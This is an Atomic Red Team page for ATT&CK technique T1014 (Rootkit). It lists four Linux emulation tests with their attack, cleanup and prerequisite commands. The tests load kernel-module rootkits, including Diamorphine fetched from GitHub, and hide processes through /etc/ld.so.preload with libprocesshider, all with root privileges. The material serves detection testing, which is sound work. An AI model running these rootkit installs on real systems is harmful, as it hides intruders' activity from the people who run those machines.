Skip to content
Atomic Red Team
atomics
T1014

T1014 - Rootkit

Description from ATT&CK (opens in a new tab)

Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)

Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or System Firmware (opens in a new tab). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)

Atomic Tests


Atomic Test #1 - Loadable Kernel Module based Rootkit

Loadable Kernel Module based Rootkit

Supported Platforms: Linux

auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553

Inputs:

NameDescriptionTypeDefault Value
rootkit_source_pathPath to the rootkit source. Used when prerequisites are fetched.pathPathToAtomicsFolder/T1014/src/Linux
rootkit_pathPath To rootkitstringPathToAtomicsFolder/T1014/bin
rootkit_nameModule namestringT1014

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo insmod #{rootkit_path}/#{rootkit_name}.ko

Cleanup Commands:

sudo rmmod #{rootkit_name}
sudo rm -rf #{rootkit_path}

Dependencies: Run with bash!

Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)
Check Prereq Commands:
if [ -f #{rootkit_path}/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
sudo apt install make
sudo apt install gcc
if [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; fi;
cp #{rootkit_source_path}/* /tmp/T1014/
cd /tmp/T1014; make
mkdir #{rootkit_path}
mv /tmp/T1014/#{rootkit_name}.ko #{rootkit_path}/#{rootkit_name}.ko
rm -rf /tmp/T1014


Atomic Test #2 - Loadable Kernel Module based Rootkit

Loadable Kernel Module based Rootkit

Supported Platforms: Linux

auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f

Inputs:

NameDescriptionTypeDefault Value
rootkit_source_pathPath to the rootkit source. Used when prerequisites are fetched.pathPathToAtomicsFolder/T1014/src/Linux
rootkit_nameModule namestringT1014

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo modprobe #{rootkit_name}

Cleanup Commands:

sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
sudo depmod -a

Dependencies: Run with bash!

Description: The kernel module must exist on disk at specified location (#{rootkit_source_path}/#{rootkit_name}.ko)
Check Prereq Commands:
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
sudo apt install make
sudo apt install gcc
if [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; touch /tmp/T1014/safe_to_delete; fi;
cp #{rootkit_source_path}/* /tmp/T1014
cd /tmp/T1014; make        
sudo cp /tmp/T1014/#{rootkit_name}.ko /lib/modules/$(uname -r)/
[ -f /tmp/T1014/safe_to_delete ] && rm -rf /tmp/T1014
sudo depmod -a


Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)

Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ld.so.preload (see also T1574.006).

Supported Platforms: Linux

auto_generated_guid: 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3

Inputs:

NameDescriptionTypeDefault Value
repoUrl of the github repo zipstringhttps://github.com/gianlucaborello/libprocesshider/ (opens in a new tab)
revRevision of the github repo zipstring25e0587d6bf2137f8792dc83242b6b0e5a72b415
library_pathFull path of the library to add to ld.so.preloadstring/usr/local/lib/libprocesshider.so

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

echo #{library_path} | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"

Cleanup Commands:

sed -i "\:^#{library_path}:d" /etc/ld.so.preload
rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic

Dependencies: Run with bash!

Description: The preload library must exist on disk at specified location (#{library_path})
Check Prereq Commands:
if [ -f #{library_path} ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
make
cp libprocesshider.so #{library_path}
cp /usr/bin/ping /usr/local/bin/evil_script.py


Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)

Loads Diamorphine kernel module, which hides itself and a processes.

Supported Platforms: Linux

auto_generated_guid: 0b996469-48c6-46e2-8155-a17f8b6c2247

Inputs:

NameDescriptionTypeDefault Value
repoUrl of the diamorphine github repostringhttps://github.com/m0nad/Diamorphine/ (opens in a new tab)
revRevision of the github repo zipstring898810523aa2033f582a4a5903ffe453334044f9
rootkit_nameModule namestringdiamorphine

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo modprobe #{rootkit_name}
ping -c 10 localhost >/dev/null & TARGETPID="$!"
ps $TARGETPID
kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"

Cleanup Commands:

kill -63 1
sudo modprobe -r #{rootkit_name}
sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
sudo depmod -a

Dependencies: Run with bash!

Description: The kernel module must exist on disk at specified location (#{rootkit_name}.ko)
Check Prereq Commands:
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
make
sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
sudo depmod -a

T1012T1016